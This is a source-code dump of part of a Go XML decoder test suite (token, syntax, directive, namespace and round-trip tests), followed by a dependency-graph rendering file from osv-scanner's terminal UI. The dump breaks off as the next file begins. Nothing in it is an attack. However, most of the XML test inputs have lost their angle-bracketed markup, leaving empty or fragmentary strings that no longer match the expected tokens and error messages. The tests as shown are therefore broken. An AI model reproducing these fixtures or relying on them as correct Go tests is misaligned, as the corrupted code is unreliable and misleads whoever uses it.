CharData{data: []byte("&;")}, EndElement{Name{"", "tag"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, CharData{data: []byte("&0a;")}, EndElement{Name{"", "tag"}, false}, CharData{data: []byte("\n")}, } func TestNonStrictRawToken(t *testing.T) { d := NewDecoder(strings.NewReader(nonStrictInput)) d.Strict = false testRawToken(t, d, nonStrictInput, nonStrictTokens) } type downCaser struct { t *testing.T r io.ByteReader } func (d *downCaser) ReadByte() (c byte, err error) { c, err = d.r.ReadByte() if c >= 'A' && c <= 'Z' { c += 'a' - 'A' } return } func (d *downCaser) Read(p []byte) (int, error) { d.t.Fatalf("unexpected Read call on downCaser reader") panic("unreachable") } func TestRawTokenAltEncoding(t *testing.T) { d := NewDecoder(strings.NewReader(testInputAltEncoding)) d.CharsetReader = func(charset string, input io.Reader) (io.Reader, error) { if charset != "x-testing-uppercase" { t.Fatalf("unexpected charset %q", charset) } return &downCaser{t, input.(io.ByteReader)}, nil } testRawToken(t, d, testInputAltEncoding, rawTokensAltEncoding) } func TestRawTokenAltEncodingNoConverter(t *testing.T) { d := NewDecoder(strings.NewReader(testInputAltEncoding)) token, err := d.RawToken() if token == nil { t.Fatalf("expected a token on first RawToken call") } if err != nil { t.Fatal(err) } token, err = d.RawToken() if token != nil { t.Errorf("expected a nil token; got %#v", token) } if err == nil { t.Fatalf("expected an error on second RawToken call") } const encoding = "x-testing-uppercase" if !strings.Contains(err.Error(), encoding) { t.Errorf("expected error to contain %q; got error: %v", encoding, err) } } func testRawToken(t *testing.T, d *Decoder, raw string, rawTokens []Token) { lastEnd := int64(0) for i, want := range rawTokens { start := d.InputOffset() have, err := d.RawToken() end := d.InputOffset() if err != nil { t.Fatalf("token %d: unexpected error: %s", i, err) } if !reflect.DeepEqual(have, want) { var shave, swant 
string if _, ok := have.(CharData); ok { shave = fmt.Sprintf("CharData(%q)", have) } else { shave = fmt.Sprintf("%#v", have) } if _, ok := want.(CharData); ok { swant = fmt.Sprintf("CharData(%q)", want) } else { swant = fmt.Sprintf("%#v", want) } t.Errorf("token %d = %s, want %s", i, shave, swant) } // Check that InputOffset returned actual token. switch { case start < lastEnd: t.Errorf("token %d: position [%d,%d) for %T is before previous token", i, start, end, have) case start >= end: // Special case: EndElement can be synthesized. if start == end && end == lastEnd { break } t.Errorf("token %d: position [%d,%d) for %T is empty", i, start, end, have) case end > int64(len(raw)): t.Errorf("token %d: position [%d,%d) for %T extends beyond input", i, start, end, have) default: text := raw[start:end] if strings.ContainsAny(text, "<>") && (!strings.HasPrefix(text, "<") || !strings.HasSuffix(text, ">")) { t.Errorf("token %d: misaligned raw token %#q for %T", i, text, have) } } lastEnd = end } } // Ensure that directives (specifically !DOCTYPE) include the complete // text of any nested directives, noting that < and > do not change // nesting depth if they are in single or double quotes. 
var nestedDirectivesInput = ` ]> ">]> ]> '>]> ]> '>]> ]> ` var nestedDirectivesTokens = []Token{ CharData{data: []byte("\n")}, Directive(`DOCTYPE []`), CharData{data: []byte("\n")}, Directive(`DOCTYPE [">]`), CharData{data: []byte("\n")}, Directive(`DOCTYPE []`), CharData{data: []byte("\n")}, Directive(`DOCTYPE ['>]`), CharData{data: []byte("\n")}, Directive(`DOCTYPE []`), CharData{data: []byte("\n")}, Directive(`DOCTYPE ['>]`), CharData{data: []byte("\n")}, Directive(`DOCTYPE []`), CharData{data: []byte("\n")}, } func TestNestedDirectives(t *testing.T) { d := NewDecoder(strings.NewReader(nestedDirectivesInput)) for i, want := range nestedDirectivesTokens { have, err := d.Token() if err != nil { t.Fatalf("token %d: unexpected error: %s", i, err) } if !reflect.DeepEqual(have, want) { t.Errorf("token %d = %#v want %#v", i, have, want) } } } func TestToken(t *testing.T) { d := NewDecoder(strings.NewReader(testInput)) d.Entity = testEntity for i, want := range cookedTokens { have, err := d.Token() if err != nil { t.Fatalf("token %d: unexpected error: %s", i, err) } if !reflect.DeepEqual(have, want) { t.Errorf("token %d = %#v want %#v", i, have, want) } } } func TestSyntax(t *testing.T) { for i := range xmlInput { d := NewDecoder(strings.NewReader(xmlInput[i])) var err error for _, err = d.Token(); err == nil; _, err = d.Token() { } if _, ok := err.(*SyntaxError); !ok { t.Fatalf(`xmlInput "%s": expected SyntaxError not received`, xmlInput[i]) } } } func TestInputLinePos(t *testing.T) { testInput := ` ` linePos := [][]int{ {1, 7}, {2, 1}, {3, 4}, {3, 6}, {6, 7}, {7, 1}, {8, 4}, {10, 4}, {10, 10}, {11, 1}, {11, 8}, } dec := NewDecoder(strings.NewReader(testInput)) for _, want := range linePos { if _, err := dec.Token(); err != nil { t.Errorf("Unexpected error: %v", err) continue } gotLine, gotCol := dec.InputPos() if gotLine != want[0] || gotCol != want[1] { t.Errorf("dec.InputPos() = %d,%d, want %d,%d", gotLine, gotCol, want[0], want[1]) } } } type allScalars struct { 
True1 bool True2 bool False1 bool False2 bool Int int Int8 int8 Int16 int16 Int32 int32 Int64 int64 Uint int Uint8 uint8 Uint16 uint16 Uint32 uint32 Uint64 uint64 Uintptr uintptr Float32 float32 Float64 float64 String string PtrString *string } var all = allScalars{ True1: true, True2: true, False1: false, False2: false, Int: 1, Int8: -2, Int16: 3, Int32: -4, Int64: 5, Uint: 6, Uint8: 7, Uint16: 8, Uint32: 9, Uint64: 10, Uintptr: 11, Float32: 13.0, Float64: 14.0, String: "15", PtrString: &sixteen, } var sixteen = "16" const testScalarsInput = ` true 1 false 0 1 -2 3 -4 5 6 7 8 9 10 11 12.0 13.0 14.0 15 16 ` func TestAllScalars(t *testing.T) { var a allScalars err := Unmarshal([]byte(testScalarsInput), &a) if err != nil { t.Fatal(err) } if !reflect.DeepEqual(a, all) { t.Errorf("have %+v want %+v", a, all) } } type item struct { FieldA string } func TestIssue569(t *testing.T) { data := `abcd` var i item err := Unmarshal([]byte(data), &i) if err != nil || i.FieldA != "abcd" { t.Fatal("Expecting abcd") } } func TestUnquotedAttrs(t *testing.T) { data := "" d := NewDecoder(strings.NewReader(data)) d.Strict = false token, err := d.Token() if _, ok := err.(*SyntaxError); ok { t.Errorf("Unexpected error: %v", err) } if token.(StartElement).Name.Local != "tag" { t.Errorf("Unexpected tag name: %v", token.(StartElement).Name.Local) } attr := token.(StartElement).Attr[0] if attr.Value != "azAZ09:-_" { t.Errorf("Unexpected attribute value: %v", attr.Value) } if attr.Name.Local != "attr" { t.Errorf("Unexpected attribute name: %v", attr.Name.Local) } } func TestValuelessAttrs(t *testing.T) { tests := [][3]string{ {"

", "p", "nowrap"}, {"

", "p", "nowrap"}, {"", "input", "checked"}, {"", "input", "checked"}, } for _, test := range tests { d := NewDecoder(strings.NewReader(test[0])) d.Strict = false token, err := d.Token() if _, ok := err.(*SyntaxError); ok { t.Errorf("Unexpected error: %v", err) } if token.(StartElement).Name.Local != test[1] { t.Errorf("Unexpected tag name: %v", token.(StartElement).Name.Local) } attr := token.(StartElement).Attr[0] if attr.Value != test[2] { t.Errorf("Unexpected attribute value: %v", attr.Value) } if attr.Name.Local != test[2] { t.Errorf("Unexpected attribute name: %v", attr.Name.Local) } } } func TestCopyTokenCharData(t *testing.T) { data := []byte("same data") var tok1 Token = CharData{data: data} tok2 := CopyToken(tok1) if !reflect.DeepEqual(tok1, tok2) { t.Error("CopyToken(CharData) != CharData") } data[1] = 'o' if reflect.DeepEqual(tok1, tok2) { t.Error("CopyToken(CharData) uses same buffer.") } } func TestCopyTokenStartElement(t *testing.T) { elt := StartElement{Name{"", "hello"}, []Attr{{Name{"", "lang"}, "en", ""}}, false, ""} var tok1 Token = elt tok2 := CopyToken(tok1) if tok1.(StartElement).Attr[0].Value != "en" { t.Error("CopyToken overwrote Attr[0]") } if !reflect.DeepEqual(tok1, tok2) { t.Error("CopyToken(StartElement) != StartElement") } tok1.(StartElement).Attr[0] = Attr{Name{"", "lang"}, "de", ""} if reflect.DeepEqual(tok1, tok2) { t.Error("CopyToken(CharData) uses same buffer.") } } func TestCopyTokenComment(t *testing.T) { data := []byte("") var tok1 Token = Comment(data) tok2 := CopyToken(tok1) if !reflect.DeepEqual(tok1, tok2) { t.Error("CopyToken(Comment) != Comment") } data[1] = 'o' if reflect.DeepEqual(tok1, tok2) { t.Error("CopyToken(Comment) uses same buffer.") } } func TestSyntaxErrorLineNum(t *testing.T) { testInput := "

Foo

\n\n

Bar\n" d := NewDecoder(strings.NewReader(testInput)) var err error for _, err = d.Token(); err == nil; _, err = d.Token() { } synerr, ok := err.(*SyntaxError) if !ok { t.Error("Expected SyntaxError.") } if synerr.Line != 3 { t.Error("SyntaxError didn't have correct line number.") } } func TestTrailingRawToken(t *testing.T) { input := ` ` d := NewDecoder(strings.NewReader(input)) var err error for _, err = d.RawToken(); err == nil; _, err = d.RawToken() { } if err != io.EOF { t.Fatalf("d.RawToken() = _, %v, want _, io.EOF", err) } } func TestTrailingToken(t *testing.T) { input := ` ` d := NewDecoder(strings.NewReader(input)) var err error for _, err = d.Token(); err == nil; _, err = d.Token() { } if err != io.EOF { t.Fatalf("d.Token() = _, %v, want _, io.EOF", err) } } func TestEntityInsideCDATA(t *testing.T) { input := `` d := NewDecoder(strings.NewReader(input)) var err error for _, err = d.Token(); err == nil; _, err = d.Token() { } if err != io.EOF { t.Fatalf("d.Token() = _, %v, want _, io.EOF", err) } } var characterTests = []struct { in string err string }{ {"\x12", "illegal character code U+0012"}, {"\x0b", "illegal character code U+000B"}, {"\xef\xbf\xbe", "illegal character code U+FFFE"}, {"\r\n\x07", "illegal character code U+0007"}, {"what's up", "expected attribute name in element"}, {"&abc\x01;", "invalid character entity &abc (no semicolon)"}, {"&\x01;", "invalid character entity & (no semicolon)"}, {"&\xef\xbf\xbe;", "invalid character entity &\uFFFE;"}, {"&hello;", "invalid character entity &hello;"}, } func TestDisallowedCharacters(t *testing.T) { for i, tt := range characterTests { d := NewDecoder(strings.NewReader(tt.in)) var err error for err == nil { _, err = d.Token() } synerr, ok := err.(*SyntaxError) if !ok { t.Fatalf("input %d d.Token() = _, %v, want _, *SyntaxError", i, err) } if synerr.Msg != tt.err { t.Fatalf("input %d synerr.Msg wrong: want %q, got %q", i, tt.err, synerr.Msg) } } } func TestIsInCharacterRange(t *testing.T) { invalid := 
[]rune{ utf8.MaxRune + 1, 0xD800, // surrogate min 0xDFFF, // surrogate max -1, } for _, r := range invalid { if isInCharacterRange(r) { t.Errorf("rune %U considered valid", r) } } } var procInstTests = []struct { input string expect [2]string }{ {`version="1.0" encoding="utf-8"`, [2]string{"1.0", "utf-8"}}, {`version="1.0" encoding='utf-8'`, [2]string{"1.0", "utf-8"}}, {`version="1.0" encoding='utf-8' `, [2]string{"1.0", "utf-8"}}, {`version="1.0" encoding=utf-8`, [2]string{"1.0", ""}}, {`encoding="FOO" `, [2]string{"", "FOO"}}, {`version=2.0 version="1.0" encoding=utf-7 encoding='utf-8'`, [2]string{"1.0", "utf-8"}}, {`version= encoding=`, [2]string{"", ""}}, {`encoding="version=1.0"`, [2]string{"", "version=1.0"}}, {``, [2]string{"", ""}}, // TODO: what's the right approach to handle these nested cases? {`encoding="version='1.0'"`, [2]string{"1.0", "version='1.0'"}}, {`version="encoding='utf-8'"`, [2]string{"encoding='utf-8'", "utf-8"}}, } func TestProcInstEncoding(t *testing.T) { for _, test := range procInstTests { if got := procInst("version", test.input); got != test.expect[0] { t.Errorf("procInst(version, %q) = %q; want %q", test.input, got, test.expect[0]) } if got := procInst("encoding", test.input); got != test.expect[1] { t.Errorf("procInst(encoding, %q) = %q; want %q", test.input, got, test.expect[1]) } } } // Ensure that directives with comments include the complete // text of any nested directives. 
var directivesWithCommentsInput = ` ]> ]> --> --> []> ` var directivesWithCommentsTokens = []Token{ CharData{data: []byte("\n")}, Directive(`DOCTYPE [ ]`), CharData{data: []byte("\n")}, Directive(`DOCTYPE [ ]`), CharData{data: []byte("\n")}, Directive(`DOCTYPE [ ]`), CharData{data: []byte("\n")}, } func TestDirectivesWithComments(t *testing.T) { d := NewDecoder(strings.NewReader(directivesWithCommentsInput)) for i, want := range directivesWithCommentsTokens { have, err := d.Token() if err != nil { t.Fatalf("token %d: unexpected error: %s", i, err) } if !reflect.DeepEqual(have, want) { t.Errorf("token %d = %#v want %#v", i, have, want) } } } // Writer whose Write method always returns an error. type errWriter struct{} func (errWriter) Write(p []byte) (n int, err error) { return 0, fmt.Errorf("unwritable") } func TestEscapeTextIOErrors(t *testing.T) { expectErr := "unwritable" err := EscapeText(errWriter{}, []byte{'A'}) if err == nil || err.Error() != expectErr { t.Errorf("have %v, want %v", err, expectErr) } } func TestEscapeTextInvalidChar(t *testing.T) { input := []byte("A \x00 terminated string.") expected := "A \uFFFD terminated string." 
buff := new(strings.Builder) if err := EscapeText(buff, input); err != nil { t.Fatalf("have %v, want nil", err) } text := buff.String() if text != expected { t.Errorf("have %v, want %v", text, expected) } } func TestIssue5880(t *testing.T) { type T []byte data, err := Marshal(T{192, 168, 0, 1}) if err != nil { t.Errorf("Marshal error: %v", err) } if !utf8.Valid(data) { t.Errorf("Marshal generated invalid UTF-8: %x", data) } } func TestIssue8535(t *testing.T) { type ExampleConflict struct { XMLName Name `xml:"example"` Link string `xml:"link"` AtomLink string `xml:"http://www.w3.org/2005/Atom link"` // Same name in a different name space } testCase := ` Example http://example.com/default http://example.com/home http://example.com/ns ` var dest ExampleConflict d := NewDecoder(strings.NewReader(testCase)) if err := d.Decode(&dest); err != nil { t.Fatal(err) } } func TestEncodeXMLNS(t *testing.T) { testCases := []struct { f func() ([]byte, error) want string ok bool }{ {encodeXMLNS1, `hello world`, true}, {encodeXMLNS2, `hello world`, true}, {encodeXMLNS3, `hello world`, true}, {encodeXMLNS4, `hello world`, false}, } for i, tc := range testCases { if b, err := tc.f(); err == nil { if got, want := string(b), tc.want; got != want { t.Errorf("%d: got %s, want %s \n", i, got, want) } } else { t.Errorf("%d: marshal failed with %s", i, err) } } } func encodeXMLNS1() ([]byte, error) { type T struct { XMLName Name `xml:"Test"` Ns string `xml:"xmlns,attr"` Body string } s := &T{Ns: "http://example.com/ns", Body: "hello world"} return Marshal(s) } func encodeXMLNS2() ([]byte, error) { type Test struct { Body string `xml:"http://example.com/ns body"` } s := &Test{Body: "hello world"} return Marshal(s) } func encodeXMLNS3() ([]byte, error) { type Test struct { XMLName Name `xml:"http://example.com/ns Test"` Body string } //s := &Test{XMLName: Name{"http://example.com/ns",""}, Body: "hello world"} is unusable as the "-" is missing // as documentation states s := &Test{Body: "hello 
world"} return Marshal(s) } func encodeXMLNS4() ([]byte, error) { type Test struct { Ns string `xml:"xmlns,attr"` Body string } s := &Test{Ns: "http://example.com/ns", Body: "hello world"} return Marshal(s) } func TestIssue11405(t *testing.T) { testCases := []string{ "", "", "", } for _, tc := range testCases { d := NewDecoder(strings.NewReader(tc)) var err error for { _, err = d.Token() if err != nil { break } } if _, ok := err.(*SyntaxError); !ok { t.Errorf("%s: Token: Got error %v, want SyntaxError", tc, err) } } } func TestIssue12417(t *testing.T) { testCases := []struct { s string ok bool }{ {``, true}, {``, true}, {``, true}, {``, false}, } for _, tc := range testCases { d := NewDecoder(strings.NewReader(tc.s)) var err error for { _, err = d.Token() if err != nil { if err == io.EOF { err = nil } break } } if err != nil && tc.ok { t.Errorf("%q: Encoding charset: expected no error, got %s", tc.s, err) continue } if err == nil && !tc.ok { t.Errorf("%q: Encoding charset: expected error, got nil", tc.s) } } } func TestIssue7113(t *testing.T) { type C struct { XMLName Name `xml:""` // Sets empty namespace } type D struct { XMLName Name `xml:"d"` } type A struct { XMLName Name `xml:""` C C `xml:""` D D } var a A structSpace := "b" xmlTest := `` t.Log(xmlTest) err := Unmarshal([]byte(xmlTest), &a) if err != nil { t.Fatal(err) } if a.XMLName.Space != structSpace { t.Errorf("overidding with empty namespace: unmarshaling, got %s, want %s\n", a.XMLName.Space, structSpace) } if len(a.C.XMLName.Space) != 0 { t.Fatalf("overidding with empty namespace: unmarshaling, got %s, want empty\n", a.C.XMLName.Space) } var b []byte b, err = Marshal(&a) if err != nil { t.Fatal(err) } if len(a.C.XMLName.Space) != 0 { t.Errorf("overidding with empty namespace: marshaling, got %s in C tag which should be empty\n", a.C.XMLName.Space) } if string(b) != xmlTest { t.Fatalf("overidding with empty namespace: marshaling, got %s, want %s\n", b, xmlTest) } var c A err = Unmarshal(b, &c) if err != 
nil { t.Fatalf("second Unmarshal failed: %s", err) } if c.XMLName.Space != "b" { t.Errorf("overidding with empty namespace: after marshaling & unmarshaling, XML name space: got %s, want %s\n", a.XMLName.Space, structSpace) } if len(c.C.XMLName.Space) != 0 { t.Errorf("overidding with empty namespace: after marshaling & unmarshaling, got %s, want empty\n", a.C.XMLName.Space) } } func TestIssue20396(t *testing.T) { var attrError = UnmarshalError("XML syntax error on line 1: expected attribute name in element") testCases := []struct { s string wantErr error }{ {``, // Issue 20396 UnmarshalError("XML syntax error on line 1: expected element name after <")}, {``, attrError}, {``, attrError}, {``, nil}, {`1`, UnmarshalError("XML syntax error on line 1: expected element name after <")}, {`1`, attrError}, {`1`, attrError}, {`1`, nil}, } var dest string for _, tc := range testCases { if got, want := Unmarshal([]byte(tc.s), &dest), tc.wantErr; got != want { if got == nil { t.Errorf("%s: Unexpected success, want %v", tc.s, want) } else if want == nil { t.Errorf("%s: Unexpected error, got %v", tc.s, got) } else if got.Error() != want.Error() { t.Errorf("%s: got %v, want %v", tc.s, got, want) } } } } func TestIssue20685(t *testing.T) { testCases := []struct { s string ok bool }{ {`one`, false}, {`one`, true}, {`one`, false}, {`one`, false}, {`one`, false}, {`one`, false}, {`one`, false}, } for _, tc := range testCases { d := NewDecoder(strings.NewReader(tc.s)) var err error for { _, err = d.Token() if err != nil { if err == io.EOF { err = nil } break } } if err != nil && tc.ok { t.Errorf("%q: Closing tag with namespace : expected no error, got %s", tc.s, err) continue } if err == nil && !tc.ok { t.Errorf("%q: Closing tag with namespace : expected error, got nil", tc.s) } } } func tokenMap(mapping func(t Token) Token) func(TokenReader) TokenReader { return func(src TokenReader) TokenReader { return mapper{ t: src, f: mapping, } } } type mapper struct { t TokenReader f func(Token) 
Token } func (m mapper) Token() (Token, error) { tok, err := m.t.Token() if err != nil { return nil, err } return m.f(tok), nil } func TestNewTokenDecoderIdempotent(t *testing.T) { d := NewDecoder(strings.NewReader(`
`)) d2 := NewTokenDecoder(d) if d != d2 { t.Error("NewTokenDecoder did not detect underlying Decoder") } } func TestWrapDecoder(t *testing.T) { d := NewDecoder(strings.NewReader(`[Re-enter Clown with a letter, and FABIAN]`)) m := tokenMap(func(t Token) Token { switch tok := t.(type) { case StartElement: if tok.Name.Local == "quote" { tok.Name.Local = "blocking" return tok } case EndElement: if tok.Name.Local == "quote" { tok.Name.Local = "blocking" return tok } } return t }) d = NewTokenDecoder(m(d)) o := struct { XMLName Name `xml:"blocking"` Chardata string `xml:",chardata"` }{} if err := d.Decode(&o); err != nil { t.Fatal("Got unexpected error while decoding:", err) } if o.Chardata != "[Re-enter Clown with a letter, and FABIAN]" { t.Fatalf("Got unexpected chardata: `%s`\n", o.Chardata) } } type tokReader struct{} func (tokReader) Token() (Token, error) { return StartElement{}, nil } type Failure struct{} func (Failure) UnmarshalXML(*Decoder, StartElement) error { return nil } func TestTokenUnmarshaler(t *testing.T) { defer func() { if r := recover(); r != nil { t.Error("Unexpected panic using custom token unmarshaler") } }() d := NewTokenDecoder(tokReader{}) d.Decode(&Failure{}) } func testRoundTrip(t *testing.T, input string) { d := NewDecoder(strings.NewReader(input)) var tokens []Token var buf bytes.Buffer e := NewEncoder(&buf) for { tok, err := d.Token() if err == io.EOF { break } if err != nil { t.Fatalf("invalid input: %v", err) } if err := e.EncodeToken(tok); err != nil { t.Fatalf("failed to re-encode input: %v", err) } tokens = append(tokens, CopyToken(tok)) } if err := e.Flush(); err != nil { t.Fatal(err) } d = NewDecoder(&buf) for { tok, err := d.Token() if err == io.EOF { break } if err != nil { t.Fatalf("failed to decode output: %v", err) } if len(tokens) == 0 { t.Fatalf("unexpected token: %#v", tok) } a, b := tokens[0], tok if !reflect.DeepEqual(a, b) { t.Fatalf("token mismatch: %#v vs %#v", a, b) } tokens = tokens[1:] } if len(tokens) > 0 { 
t.Fatalf("lost tokens: %#v", tokens) } } func TestRoundTrip(t *testing.T) { tests := map[string]string{ "trailing colon": ``, "comments in directives": `--x --> > --x ]>`, } for name, input := range tests { t.Run(name, func(t *testing.T) { testRoundTrip(t, input) }) } } func TestParseErrors(t *testing.T) { withDefaultHeader := func(s string) string { return `` + s } tests := []struct { src string err string }{ {withDefaultHeader(``), `unexpected end element `}, {withDefaultHeader(``), `element in space x closed by in space y`}, {withDefaultHeader(``), `expected target name after `), `invalid sequence `), `invalid sequence `), `invalid baz`), `element in space zzz closed by in space ""`}, {withDefaultHeader("\xf1"), `invalid UTF-8`}, // Header-related errors. {``, `unsupported version "1.1"; only version 1.0 is supported`}, // Cases below are for "no errors". {withDefaultHeader(``), ``}, {withDefaultHeader(``), ``}, } for _, test := range tests { d := NewDecoder(strings.NewReader(test.src)) var err error for { _, err = d.Token() if err != nil { break } } if test.err == "" { if err != io.EOF { t.Errorf("parse %s: have %q error, expected none", test.src, err) } continue } // Inv: err != nil if err == io.EOF { t.Errorf("parse %s: unexpected EOF", test.src) continue } if !strings.Contains(err.Error(), test.err) { t.Errorf("parse %s: can't find %q error substring\nerror: %q", test.src, test.err, err) continue } } } const testInputHTMLAutoClose = `












abc

` func BenchmarkHTMLAutoClose(b *testing.B) { b.RunParallel(func(p *testing.PB) { for p.Next() { d := NewDecoder(strings.NewReader(testInputHTMLAutoClose)) d.Strict = false d.AutoClose = HTMLAutoClose d.Entity = HTMLEntity for { _, err := d.Token() if err != nil { if err == io.EOF { break } b.Fatalf("unexpected error: %v", err) } } } }) } func TestHTMLAutoClose(t *testing.T) { wantTokens := []Token{ ProcInst{"xml", []byte(`version="1.0" encoding="UTF-8"`)}, CharData{data: []byte("\n")}, StartElement{Name{"", "br"}, []Attr{}, false, ""}, EndElement{Name{"", "br"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "br"}, []Attr{}, true, ""}, EndElement{Name{"", "br"}, true}, StartElement{Name{"", "br"}, []Attr{}, true, ""}, EndElement{Name{"", "br"}, true}, CharData{data: []byte("\n")}, StartElement{Name{"", "br"}, []Attr{}, false, ""}, EndElement{Name{"", "br"}, false}, StartElement{Name{"", "br"}, []Attr{}, false, ""}, EndElement{Name{"", "br"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "br"}, []Attr{}, false, ""}, EndElement{Name{"", "br"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "BR"}, []Attr{}, false, ""}, EndElement{Name{"", "BR"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "BR"}, []Attr{}, true, ""}, EndElement{Name{"", "BR"}, true}, StartElement{Name{"", "BR"}, []Attr{}, true, ""}, EndElement{Name{"", "BR"}, true}, CharData{data: []byte("\n")}, StartElement{Name{"", "Br"}, []Attr{}, false, ""}, EndElement{Name{"", "Br"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "BR"}, []Attr{}, false, ""}, EndElement{Name{"", "BR"}, false}, StartElement{Name{"", "span"}, []Attr{{Name: Name{"", "id"}, Value: "test"}}, false, ""}, CharData{data: []byte("abc")}, EndElement{Name{"", "span"}, false}, StartElement{Name{"", "br"}, []Attr{}, true, ""}, EndElement{Name{"", "br"}, true}, StartElement{Name{"", "br"}, []Attr{}, true, ""}, EndElement{Name{"", "br"}, true}, } d := 
NewDecoder(strings.NewReader(testInputHTMLAutoClose)) d.Strict = false d.AutoClose = HTMLAutoClose d.Entity = HTMLEntity var haveTokens []Token for { tok, err := d.Token() if err != nil { if err == io.EOF { break } t.Fatalf("unexpected error: %v", err) } haveTokens = append(haveTokens, CopyToken(tok)) } if len(haveTokens) != len(wantTokens) { t.Errorf("tokens count mismatch: have %d, want %d", len(haveTokens), len(wantTokens)) } for i, want := range wantTokens { if i >= len(haveTokens) { t.Errorf("token[%d] expected %#v, have no token", i, want) } else { have := haveTokens[i] if !reflect.DeepEqual(have, want) { t.Errorf("token[%d] mismatch:\nhave: %#v\nwant: %#v", i, have, want) } } } } ================================================ FILE: internal/tui/dependency-graph.go ================================================ package tui import ( "fmt" "slices" "strings" "charm.land/lipgloss/v2" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/resolution" ) type chainGraphNode struct { vk resolve.VersionKey isDirect bool // if this is a direct dependency dependents []*chainGraphNode // in this representation, the dependents are the children of this node // so the root of the tree is rendered at the bottom } type ChainGraph struct { *chainGraphNode } func subgraphEdges(sg *resolution.DependencySubgraph, direct resolve.NodeID) []resolve.Edge { // find the shortest chain of edges from direct to the vulnerable node, excluding the root->direct edge. 
// return them in reverse order, with edges[0].To = sg.Dependency edges := make([]resolve.Edge, 0, sg.Nodes[0].Distance-1) nID := direct for nID != sg.Dependency { n := sg.Nodes[nID] idx := slices.IndexFunc(n.Children, func(e resolve.Edge) bool { return sg.Nodes[e.To].Distance == n.Distance-1 }) if idx < 0 { break } edge := n.Children[idx] edges = append(edges, edge) nID = edge.To } slices.Reverse(edges) return edges } // FindChainGraphs constructs a graph of the shortest paths from each direct dependency to each unique vulnerable node func FindChainGraphs(subgraphs []*resolution.DependencySubgraph) []ChainGraph { // Construct the ChainGraphs ret := make([]ChainGraph, 0, len(subgraphs)) for _, sg := range subgraphs { nodes := make(map[resolve.NodeID]*chainGraphNode) isDirect := func(nID resolve.NodeID) bool { return slices.ContainsFunc(sg.Nodes[nID].Parents, func(e resolve.Edge) bool { return e.From == 0 }) } // Create and add the vulnerable node to the returned graphs n := &chainGraphNode{ vk: sg.Nodes[sg.Dependency].Version, dependents: nil, isDirect: isDirect(sg.Dependency), } ret = append(ret, ChainGraph{n}) nodes[sg.Dependency] = n for _, startEdge := range sg.Nodes[0].Children { // Going up the chain, add the node to the previous' children if it's not there already for _, e := range subgraphEdges(sg, startEdge.To) { p := nodes[e.To] n, ok := nodes[e.From] if !ok { n = &chainGraphNode{ vk: sg.Nodes[e.From].Version, dependents: nil, isDirect: isDirect(e.From), } nodes[e.From] = n } if !slices.Contains(p.dependents, n) { p.dependents = append(p.dependents, n) } } } } return ret } func (c ChainGraph) String() string { if c.chainGraphNode == nil { return "" } s, _ := c.subString(true) // Fill in the missing whitespace w := lipgloss.Width(s) h := lipgloss.Height(s) // need to use w+1 to force lipgloss to place whitespace return lipgloss.Place(w+1, h, lipgloss.Left, lipgloss.Top, s) } var ( directNodeStyle = 
lipgloss.NewStyle().Bold(true).Foreground(lipgloss.Color("12")).Margin(0, 1) // blue text vulnNodeStyle = lipgloss.NewStyle().Bold(true).Foreground(lipgloss.Color("15")).Background(lipgloss.Color("1")).Padding(0, 1) // white on red background directVulnNodeStyle = lipgloss.NewStyle().Bold(true).Foreground(lipgloss.Color("15")).Background(lipgloss.Color("5")).Padding(0, 1) // white on purple background ) // recursive construction of the visualized tree // returns the subtree and the offset for where a child should connect to this func (c *chainGraphNode) subString(isVuln bool) (string, int) { nodeStr := fmt.Sprintf("%s@%s", c.vk.Name, c.vk.Version) switch { case isVuln && c.isDirect: nodeStr = directVulnNodeStyle.Render(nodeStr) case isVuln: nodeStr = vulnNodeStyle.Render(nodeStr) case c.isDirect: nodeStr = directNodeStyle.Render(nodeStr) } nodeOffset := lipgloss.Width(nodeStr) / 2 // No children, just show the text if len(c.dependents) == 0 { return nodeStr, nodeOffset } // one child, add a single line connecting this to the child above it if len(c.dependents) == 1 { childStr, childCenter := c.dependents[0].subString(false) if nodeOffset > childCenter { // left-pad the child if the parent is wider childStr = lipgloss.JoinHorizontal(lipgloss.Bottom, strings.Repeat(" ", nodeOffset-childCenter), childStr) childCenter = nodeOffset } nodeStr = strings.Repeat(" ", childCenter-nodeOffset) + nodeStr joinerStr := strings.Repeat(" ", childCenter) + "│" return fmt.Sprintf("%s\n%s\n%s", childStr, joinerStr, nodeStr), childCenter } // multiple children: // Join the children together on one line nChilds := len(c.dependents) paddedChildStrings := make([]string, 0, 2*nChilds) // string of children, with padding strings in between childOffsets := make([]int, 0, nChilds) // where above the children to connect the lines to them width := 0 for _, ch := range c.dependents { str, off := ch.subString(false) paddedChildStrings = append(paddedChildStrings, str, " ") childOffsets = 
append(childOffsets, width+off) width += lipgloss.Width(str) + 1 } joinedChildren := lipgloss.JoinHorizontal(lipgloss.Bottom, paddedChildStrings...) // create the connecting line // connector bits: ┌ ─ ┼ ┐ ┬ ┴ ┘ └ firstOffset := childOffsets[0] lastOffset := childOffsets[nChilds-1] var midOffset int // where on the line to connect the parent if nChilds%2 == 0 { // if there's an even number of children, connect between the middle two midOffset = (childOffsets[nChilds/2-1] + childOffsets[nChilds/2]) / 2 } else { // otherwise, connect inline with the middle child midOffset = childOffsets[nChilds/2] } line := make([]rune, lastOffset+1) offsetIdx := 0 for i := range line { switch { case i < firstOffset: line[i] = ' ' case i == firstOffset: line[i] = '└' offsetIdx++ case i == lastOffset: line[i] = '┘' offsetIdx++ case i == midOffset: if i == childOffsets[offsetIdx] { line[i] = '┼' offsetIdx++ } else { line[i] = '┬' } case i == childOffsets[offsetIdx]: line[i] = '┴' offsetIdx++ default: line[i] = '─' } } // join everything together linedChildren := fmt.Sprintf("%s\n%s", joinedChildren, string(line)) if nodeOffset > midOffset { // left-pad the children if the parent is wider linedChildren = lipgloss.JoinHorizontal(lipgloss.Bottom, strings.Repeat(" ", nodeOffset-midOffset), linedChildren) midOffset = nodeOffset } nodeStr = strings.Repeat(" ", midOffset-nodeOffset) + nodeStr return fmt.Sprintf("%s\n%s", linedChildren, nodeStr), midOffset } ================================================ FILE: internal/tui/in-place-info.go ================================================ package tui import ( "fmt" "charm.land/bubbles/v2/key" 